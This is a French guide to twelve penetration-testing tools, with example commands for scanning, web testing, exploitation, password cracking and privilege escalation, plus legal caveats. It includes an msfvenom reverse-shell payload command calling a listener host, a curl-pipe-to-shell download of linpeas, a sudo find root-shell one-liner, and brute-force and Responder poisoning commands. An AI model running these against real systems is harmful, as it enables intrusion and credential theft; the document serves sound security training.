Outils de test d'intrusion : 12 essentiels pour 2026

Comment nous avons sélectionné ces outils de test d'intrusion

Trois filtres s'appliquent. Premièrement, la maintenance active. Les outils sans version significative depuis 2022 ont été éliminés, peu importe à quel point ils étaient adorés il y a dix ans. Les menaces évoluent, et les outils qui n'évoluent pas avec elles deviennent un fardeau. Deuxièmement, l'outil doit correspondre à une phase de pentest claire. Un framework généraliste qui "fait tout" finit en général par ne rien faire correctement. Troisièmement, l'outil doit apparaître dans de vrais rapports de mission, ceux qui sont présentés à un RSSI. Les outils qui n'existent que dans les conférences et les captures d'écran Twitter ont été écartés.

Ce que cette liste n'est pas : un catalogue exhaustif. Kali Linux embarque des centaines d'outils. La plupart restent inutilisés dans /usr/bin pendant que vous attrapez les cinq mêmes chaque jour. Nous avons retenu les cinq (enfin, douze) que vous allez vraiment utiliser.

Ce que cette liste n'est pas non plus : un cours d'initiation. Nous supposons que vous savez ce qu'est TCP, que vous avez utilisé un terminal et que vous comprenez la différence entre un payload et un exploit. Si ces concepts sont nouveaux, entraînez-vous d'abord sur des cibles vulnérables intentionnelles pour bâtir le modèle mental sous-jacent avant de toucher à ces outils.

Outils de reconnaissance et d'énumération

La reconnaissance est le point de départ de toute mission, et c'est aussi la phase à laquelle les pentesters débutants consacrent le moins de temps. Sautez la reconnaissance et vous passez à côté du sous-domaine de pré-production à moitié oublié qui contient les identifiants de production. Les outils ci-dessous construisent votre carte de la cible avant toute action agressive.

1. Nmap

Nmap reste le scanner réseau par défaut en 2026, et ce n'est pas faute d'alternatives. C'est parce que Nmap a posé les bases correctement en 1997 et n'a jamais cessé d'être maintenu. La version 7.94 (sortie en 2023) a apporté un meilleur support IPv6 et une détection de service améliorée pour les variantes HTTPS modernes.

La commande à lancer sur chaque mission :

nmap -sV -sC -p- -T4 target.com -oA scan-initial

Cela scanne les 65 535 ports TCP (-p-), fait de la détection de version (-sV) et exécute le jeu de scripts par défaut (-sC), utilise un timing agressif (-T4) et sauvegarde la sortie dans trois formats (-oA). Sur un serveur Linux typique, prévoyez 5 à 15 minutes par hôte selon la limitation de débit.

Pour l'ensemble des flags courants et des one-liners, notre aide-mémoire Nmap regroupe les motifs que vous copierez le plus souvent.

2. Gobuster

Gobuster gère le brute force de répertoires et de fichiers sans la lourdeur graphique des outils plus anciens. Écrit en Go, il monte en charge proprement et produit une sortie suffisamment propre pour être traitée au grep ensuite. La commande standard :

gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -t 50

Le choix de la wordlist compte plus que n'importe quel flag. Le fichier raft-medium-directories.txt de SecLists trouve typiquement 30 % d'endpoints en plus que le dirb/common.txt par défaut de Kali, en temps comparable. Notre guide des wordlists Gobuster détaille quelle liste utiliser pour quel scénario.

En pratique, lancez Gobuster en parallèle de la navigation manuelle pendant la phase de cartographie. Le temps que vous parcouriez l'application en utilisateur normal, Gobuster a déjà fait remonter le panneau d'administration qui n'était jamais lié dans la navigation publique.

3. Amass

Amass est l'outil d'énumération de sous-domaines dont on ne parle pas assez. Il agrège les données des logs de transparence des certificats, des enregistrements DNS publics, des résultats des moteurs de recherche et des archives web pour bâtir une image complète de l'empreinte externe d'une organisation. L'invocation de base :

amass enum -d target.com -o subdomains.txt

La plupart des missions ont quelques domaines principaux dans le périmètre. Lancez Amass contre chacun avant de commencer à scanner. L'environnement de pré-production oublié, la landing page marketing dormante, le portail client legacy qui s'authentifie encore contre l'AD de production : c'est là que vivent les constats critiques.

Outils de test d'applications web

Les applications web sont là où viennent la plupart des constats du monde réel. Le DBIR 2024 de Verizon a chiffré les applications web comme vecteur initial dans 26 % des brèches confirmées. Les outils ci-dessous gèrent l'essentiel du test d'applications web.

4. Burp Suite

Burp Suite est le centre de toute mission web et la raison pour laquelle la majorité des pentesters tolèrent Java. La Community Edition est gratuite et couvre peut-être 80 % des workflows courants. La Pro Edition ajoute un scanner automatisé, l'Intruder à pleine vitesse et Collaborator pour les tests hors bande.

Les quatre fonctions que vous utilisez chaque jour : Proxy pour intercepter les requêtes, Repeater pour modifier et renvoyer des requêtes individuelles, Intruder pour le fuzzing de paramètres, et la site map pour comprendre la structure de l'application. Maîtrisez ces fonctions avant de toucher au reste du menu.

Si vous n'avez jamais lancé Burp, notre tutoriel Burp Suite couvre la première heure d'installation et le workflow que vous utiliserez à chaque mission.

5. sqlmap

Une fois un point d'injection confirmé manuellement, sqlmap automatise l'extraction. Sauvegardez la requête depuis Burp dans un fichier, puis pointez sqlmap dessus :

sqlmap -r request.txt --batch --level=3 --risk=2

La règle professionnelle : manuel d'abord, sqlmap ensuite. Lancer sqlmap contre une application inconnue génère des centaines de requêtes, peut faire planter des backends instables et déclenche des alertes WAF qui mettent fin à votre accès. Confirmez l'injection à la main avec une apostrophe, identifiez le paramètre, puis laissez sqlmap gérer l'extraction.

Une note de terrain : sqlmap est excellent contre MySQL, PostgreSQL, MSSQL et Oracle. Les bases de données cloud plus récentes et certains backends NoSQL nécessitent parfois une technique manuelle. L'outil ne remplace pas la compréhension de ce que l'injection fait réellement au parser sous-jacent.

6. ffuf

ffuf (Fuzz Faster U Fool) fait ce que Gobuster fait pour les répertoires, plus le fuzzing de paramètres et d'en-têtes que Gobuster ne propose pas. Quand vous devez découvrir des paramètres d'URL cachés ou fuzzer les en-têtes HTTP à la recherche de candidats SSRF, ffuf est l'outil à attraper :

ffuf -u https://target.com/api?FUZZ=test -w params.txt -mc 200

La flexibilité vit dans le filtrage : matchez par code de statut, taille de réponse, nombre de mots ou nombre de lignes. Les pages 404 personnalisées qui mettent Gobuster en échec sont typiquement attrapées par ffuf avec un flag -fs sur la taille de réponse.

Frameworks d'exploitation

Après la cartographie et la découverte vient l'exploitation. Les outils ci-dessous prennent une vulnérabilité que vous avez trouvée et la transforment en quelque chose que vous pouvez démontrer à un client.

7. Metasploit Framework

Metasploit Framework reste pertinent en 2026 pour une raison : quand l'exploit dont vous avez besoin existe, Metasploit en a généralement un module stable. Le framework embarque des milliers d'exploits, payloads, encodeurs et modules de post-exploitation. Lancez msfconsole et commencez par configurer le workspace :

workspace -a engagement-name
db_nmap -sV -p- target.com
search type:exploit name:cve-2023-

La commande db_nmap importe les résultats de scan directement dans la base de données Metasploit, ce qui permet aux recherches et modules suivants de référencer les hôtes cibles sans retaper d'IP à la main. Cherchez par CVE, par nom de service ou par version de logiciel. Le taux de succès en mission réelle : peut-être un constat sur vingt finit par utiliser un module Metasploit standard, mais quand cela fonctionne, la preuve de concept s'écrit toute seule.

Une note honnête sur la détection. Les EDR de production attrapent les payloads Metasploit standards. C'est le comportement attendu dans un environnement protégé, pas un échec de l'outil. La parade est la génération de payload personnalisé, et c'est là que msfvenom intervient.

8. msfvenom

msfvenom est le générateur de payloads livré avec Metasploit. Vous construisez des payloads spécifiques à une plateforme, vous les encodez pour gérer les caractères interdits et vous produisez le format dont votre méthode de livraison a besoin. Le one-liner de reverse shell que tout le monde finit par mémoriser :

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf -o payload.elf

Notre aide-mémoire msfvenom couvre les combinaisons plateforme et format dont vous avez vraiment besoin : EXE Windows, ELF Linux, webshells PHP, JSP pour Tomcat, ASP pour IIS. Mémorisez-en trois, cherchez les autres au besoin.

En pratique, générez le payload, configurez l'écouteur avec multi/handler, puis déclenchez l'exécution via ce que la vulnérabilité permet. L'effort se trouve dans la découverte de la vulnérabilité ; la génération de payload est mécanique une fois que vous l'avez fait deux fois.

Outils de cassage de mots de passe

Les hashs de mots de passe surgissent partout dans un pentest : fichiers shadow issus d'une escalade de privilèges, dumps NTDS.dit d'Active Directory, extractions de bases de données applicatives via injection SQL, hashs NTLMv2 capturés avec Responder. Trois outils gèrent 95 % du travail.

9. Hashcat

Hashcat est le casseur accéléré par GPU, et sur du matériel moderne il est radicalement plus rapide que tout ce qui est basé CPU. Une seule RTX 4090 enchaîne plus de 200 milliards de hashs MD5 par seconde. Le workflow standard :

hashcat -m 1000 -a 0 ntlm-hashes.txt rockyou.txt -r best64.rule

Cette commande lance le mode 1000 (NTLM), le mode d'attaque 0 (dictionnaire), contre ntlm-hashes.txt en utilisant la wordlist rockyou avec le jeu de règles best64. Pour la couverture complète des types de hash, des modes d'attaque et des stratégies de wordlist, notre tutoriel de cassage de hash détaille le workflow de bout en bout.

10. John the Ripper

John the Ripper est l'outil que vous attrapez quand la flexibilité de format compte plus que la vitesse brute. John gère plus de 400 formats de hashs et de chiffrement nativement, y compris des formats exotiques (trousseaux Mac OS X, fichiers ID Lotus Notes, bases KeePass) où le support Hashcat est inégal.

john --wordlist=rockyou.txt --rules=KoreLogic shadow.txt

En pratique, lancez John quand Hashcat ne supporte pas le format. Sinon, Hashcat gagne sur la vitesse à chaque fois. Les deux outils se complètent ; le faux débat est de savoir lequel utiliser de manière exclusive.

11. Hydra

Hydra est l'outil d'attaque de mots de passe en ligne : brute force SSH, brute force de formulaires HTTP, FTP, RDP, SMB. Utilisez-le avec parcimonie. Les attaques en ligne génèrent du bruit, verrouillent des comptes et déclenchent la détection. Quand le périmètre de la mission autorise explicitement le test d'identifiants contre un formulaire de connexion exposé, Hydra est le bon outil :

hydra -L users.txt -P passwords.txt ssh://target.com -t 4

Bridez agressivement (-t 4 veut dire quatre threads parallèles, pas quarante). Les politiques de verrouillage de compte épuiseront votre wordlist avant que vous trouviez quoi que ce soit si vous courez après la limite de débit.

Outils d'escalade de privilèges

Vous avez décroché un shell à faibles privilèges. Et maintenant ? Les outils ci-dessous automatisent l'énumération fastidieuse qui sépare le pentester occasionnel de celui qui escalade vers root de manière fiable.

12. LinPEAS, WinPEAS et GTFOBins

Le kit d'escalade de privilèges est en réalité trois ressources qui fonctionnent ensemble : deux scripts d'énumération et un catalogue de référence.

LinPEAS est un script bash unique qui énumère tous les vecteurs d'escalade Linux que vous vérifieriez autrement à la main. Binaires SUID, permissions sudo, capabilities, fichiers world-writable, version du kernel, tâches cron, systèmes de fichiers montés, variables d'environnement : tout est vérifié, puis coloré selon l'exploitabilité.

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

La sortie est verbeuse. Le jaune signale ce qui est intéressant ; le rouge signale une escalade probable. Survolez à la recherche de rouge, puis vérifiez chaque trouvaille manuellement. LinPEAS produit parfois des faux positifs, surtout sur les distributions durcies.

WinPEAS est l'équivalent Windows. Même idée : énumération automatisée complète, sortie colorée, on vous pointe vers le vecteur le plus prometteur. Il vérifie les services installés, les permissions du registre, les tâches planifiées, AlwaysInstallElevated, les chemins de service non quotés, les identifiants stockés et les relations de confiance AD. Lancez-le depuis un shell à faibles privilèges, parsez les entrées rouges, validez manuellement avant d'exploiter. La combinaison de LinPEAS et WinPEAS remplace environ trois heures de requêtes find et wmic manuelles à chaque mission.

GTFOBins n'est pas un outil que vous installez ; c'est une référence curated sur gtfobins.github.io qui catalogue les binaires Unix exploitables pour l'escalade de privilèges. Quand LinPEAS fait remonter une permission sudo comme (ALL) NOPASSWD: /usr/bin/find, GTFOBins vous dit exactement comment la militariser :

sudo find . -exec /bin/sh \; -quit

Shell root. Le même schéma de recherche fonctionne pour les binaires SUID, les attributions de capabilities et les évasions de shells limités. Mémorisez l'URL ; vous la taperez constamment. L'équivalent Windows est LOLBAS sur lolbas-project.github.io.

Analyse réseau et de trafic

Certaines missions vous lâchent sur un réseau et vous demandent ce que vous y voyez. Les outils ci-dessous décodent le câble et extraient des identifiants depuis les diffusions que personne n'avait remarqué qu'elles étaient diffusées.

Wireshark

Wireshark est l'analyseur de protocole. PCAP capturé sur un périmètre interne, trafic suspect d'une réponse à incident, captures de paquets d'un challenge CTF : Wireshark les lit tous. Les filtres d'affichage sont là où la valeur se trouve :

http.request.method == "POST" and http.request.uri contains "login"
tcp.stream eq 5
tls.handshake.extensions_server_name == "target.com"

Pour un pentest réseau autorisé, lancez une capture sur le segment auquel vous avez accès, puis filtrez les identifiants en clair, les noms d'hôtes internes et les motifs de trafic inhabituels. Les protocoles legacy qui ne devraient plus exister sur les réseaux modernes (LLMNR, NBNS, telnet, FTP en clair) existent encore sur un nombre surprenant de LANs d'entreprise.

Responder

Responder est l'empoisonneur LLMNR, NBT-NS et MDNS utilisé en pentest interne autorisé. Quand un client Windows interroge un nom d'hôte que le DNS ne résout pas, Responder répond, le client tente de s'authentifier et vous récupérez le hash NTLMv2 pour cassage hors ligne avec Hashcat.

responder -I eth0 -wrf

N'utilisez Responder qu'avec une autorisation écrite explicite pour tester un réseau interne. L'outil génère de vraies tentatives d'authentification contre votre machine ; le lancer sur un réseau qui ne vous appartient pas est un délit pénal dans la majorité des juridictions. Quand le périmètre de mission mentionne une évaluation AD interne, c'est l'outil standard.

Les outils de test d'intrusion à éviter en 2026

Un guide de ce qu'il faut utiliser est incomplet sans un guide de ce qu'il faut ignorer. Les outils ci-dessous apparaissent dans des articles plus anciens mais ne valent plus l'installation.

Évitez l'interface graphique de DirBuster. La GUI Java est d'une lenteur glaciale comparée à ffuf ou Gobuster et n'apporte rien que la CLI ne gère mieux.

Évitez THC-IPV6. L'outillage IPv6 n'a plus vu de maintenance significative depuis des années, et le test réseau moderne s'appuie sur le support natif du scanner (Nmap supporte IPv6 avec -6 depuis la version 7.20).

Évitez les plateformes "tout-en-un" génériques qui promettent "d'automatiser le pentest entier". Les outils ci-dessus existent dans leur forme actuelle parce que le pentest ne peut pas être totalement automatisé. Une plateforme qui prétend le contraire vend du scan de vulnérabilités sous un autre nom.

Évitez tout outil dont le dernier commit est antérieur à 2022, peu importe sa célébrité passée. Le web a changé ; les outils qui n'ont pas changé avec lui produisent une sortie obsolète et des faux négatifs qui gaspillent des heures de votre budget de mission.

Construire votre premier kit d'outils de test d'intrusion

L'erreur que font la plupart des débutants est d'installer tous les outils de ce guide dès le premier jour. Trois semaines plus tard, ils ont utilisé Nmap deux fois et oublié à quoi sert le reste.

La progression qui fonctionne réellement :

1. Installez Kali Linux dans une VM, ou utilisez les images Docker officielles pour les outils individuels.
2. Passez un mois à devenir fluide avec Nmap. Lancez-le contre chaque cible CTF que vous touchez. Lisez la sortie jusqu'à pouvoir la prédire.
3. Ajoutez Burp Suite Community. Faites passer votre navigateur par son proxy pour la navigation web normale, pas seulement pour les tests. L'intuition du trafic HTTP vient en le regardant bouger, pas en lisant à son sujet.
4. Ajoutez sqlmap et Gobuster. Utilisez-les sur des applications volontairement vulnérables jusqu'à pouvoir les lancer sans réfléchir.
5. Ajoutez Hashcat pour chaque hash de mot de passe que vous croisez en CTF.
6. Ajoutez Metasploit quand vous avez une vulnérabilité qui appelle un exploit, pas avant.
7. Adoptez LinPEAS et WinPEAS la première fois que vous décrochez un shell à faibles privilèges.

Remarquez ce qui n'est pas dans cette liste : il n'y a pas d'étape "mémoriser 100 commandes depuis un aide-mémoire". Les aide-mémoires existent comme références quand vous en avez besoin. Construisez la mémoire musculaire par la répétition sur de vraies cibles, pas avec des cartes de révision. L'index officiel des outils Kali est le bon endroit pour retrouver les flags que vous oubliez ; n'essayez pas de le mémoriser.

Considérations légales et éthiques

Les missions autorisées, les compétitions CTF et vos environnements de lab dédiés sont les seuls contextes sûrs pour les outils de ce guide. Votre document de périmètre de mission devrait lister explicitement chaque catégorie d'outil que vous comptez utiliser, particulièrement les outils intrusifs comme Hydra et Responder, où le bruit ambiant peut perturber les systèmes de production.

Pour la pratique, utilisez des environnements conçus à cet effet : labs HackerDNA, VMs VulnHub ou des configurations Docker locales d'applications volontairement vulnérables. Ils existent spécifiquement pour apprendre la sécurité offensive et ne portent aucune exposition juridique. L'OWASP Top 10 et le framework MITRE ATT&CK publient tous deux les techniques derrière les outils ci-dessus, ce qui aide quand vous devez rattacher un constat à une catégorie de vulnérabilité reconnue dans votre rapport.

Quand une mission autorise ces outils, documentez ce que vous avez lancé, quand et contre quoi. La trace d'audit vous protège, vous comme le client. Si un incident en aval fait l'objet d'une enquête, votre sortie sqlmap horodatée prouve que vous étiez dans le périmètre.